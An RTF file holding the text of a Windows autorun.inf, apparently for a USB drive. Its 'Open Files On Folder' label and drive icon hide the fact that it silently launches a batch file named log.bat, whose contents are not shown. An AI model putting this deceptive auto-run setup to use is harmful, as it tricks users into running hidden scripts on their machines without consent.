{\rtf1\ansi\ansicpg1251\cocoartf1561\cocoasubrtf400
{\fonttbl\f0\fmodern\fcharset0 Courier;\f1\fmodern\fcharset0 Courier-Bold;}
{\colortbl;\red255\green255\blue255;\red87\green197\blue83;\red254\green254\blue254;\red109\green109\blue109;
\red201\green201\blue201;\red11\green102\blue255;\red0\green0\blue255;}
{\*\expandedcolortbl;;\cssrgb\c40000\c80000\c40000;\cssrgb\c99608\c99608\c99608;\cssrgb\c50196\c50196\c50196;
\cssrgb\c82745\c82745\c82745;\cssrgb\c0\c50196\c100000;\cssrgb\c0\c0\c100000;}
{\*\listtable{\list\listtemplateid1\listhybrid{\listlevel\levelnfc0\levelnfcn0\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{decimal\}}{\leveltext\leveltemplateid1\'01\'00;}{\levelnumbers\'01;}\fi-360\li720\lin720 }{\listname ;}\listid1}}
{\*\listoverridetable{\listoverride\listid1\listoverridecount0\ls1}}
\paperw11900\paperh16840\margl1440\margr1440\vieww10800\viewh8400\viewkind0
\deftab720
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls1\ilvl0
\f0\fs26\fsmilli13333 \cf2 \cb3 \expnd0\expndtw0\kerning0
[\cf4 autorun\cf2 ]\cf5 \cb1 \
\ls1\ilvl0\cf4 \cb3 action=
\f1\b \cf6 Open
\f0\b0 \cf4  Files 
\f1\b \cf6 On
\f0\b0 \cf4  Folder\cf5 \cb1 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls1\ilvl0
\f1\b \cf6 \cb3 icon
\f0\b0 \cf4 =icons\\
\f1\b \cf6 drive
\f0\b0 \cf4 .ico\cf5 \cb1 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\partightenfactor0
\ls1\ilvl0\cf7 \cb3 shellexecute\cf4 =log.bat}